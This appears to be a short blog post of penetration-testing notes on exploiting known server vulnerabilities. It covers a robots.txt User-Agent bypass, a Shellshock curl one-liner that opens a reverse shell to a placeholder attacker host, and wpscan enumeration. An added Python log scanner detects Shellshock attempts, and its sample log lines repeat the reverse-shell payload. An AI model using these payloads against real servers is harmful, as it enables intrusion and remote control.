Maojui

Attacking Servers (3) | Exploiting Known Vulnerabilities

2022-08-03

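Attack flow:

  1. Find out which services the target has running
  2. Check whether the services they have set up have exploitable known vulnerabilities
  3. Exploit the vulnerability and find a way to get a shell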

Web Service

Apache

Robots.txt: to bypass a robots.txt that answers “You are not a search engine. Permission denied.”, send a search-engine User-Agent:

    User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)

cgi-bin

  • ShellShock PHP < 5.6.2

    curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/ATTACKER IP/PORT 0>&1' http://VICTIM/cgi-bin/admin.cgi
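On the defending side, the request above leaves a distinctive trace in the web server log: a header value containing the bash function-definition prefix `() {`. The following is an added example, not part of the original post, that scans Apache access logs for that pattern and pulls out any `/dev/tcp` callback address as an incident-response pivot. It assumes the Apache "combined" log format, and the sample lines are constructed.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Shellshock trigger: a logged field that contains a bash function definition "() {".
FUNC_DEF = re.compile(r'\(\)\s*\{')
# Callback target inside the payload, useful for correlating with egress/firewall logs.
CALLBACK = re.compile(r'/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)')

def scan(lines):
    """Return one finding per log line whose request, Referer or User-Agent carries '() {'."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not in combined format; skipped rather than guessed at
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if FUNC_DEF.search(value):
                cb = CALLBACK.search(value)
                findings.append({
                    "src": m.group("ip"),
                    "request": m.group("request"),
                    "status": int(m.group("status")),
                    "field": field,
                    "cgi": "/cgi-bin/" in m.group("request"),
                    "callback": (cb.group("host"), int(cb.group("port"))) if cb else None,
                })
                break  # one finding per line is enough
    return findings

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [03/Aug/2022:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 120 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"',
    '198.51.100.7 - - [03/Aug/2022:10:00:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 500 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"',
    '192.0.2.10 - - [03/Aug/2022:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "curl/7.81.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit with `cgi` set and a `callback` value is the one to check against outbound connection logs first.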

WordPress

  • WordPress Security Scanner

    wpscan --url sandbox.local --enumerate ap,at,cb,dbe
  • Admin permission

    • When WordPress receives the zip file, it extracts it into wp-content/plugins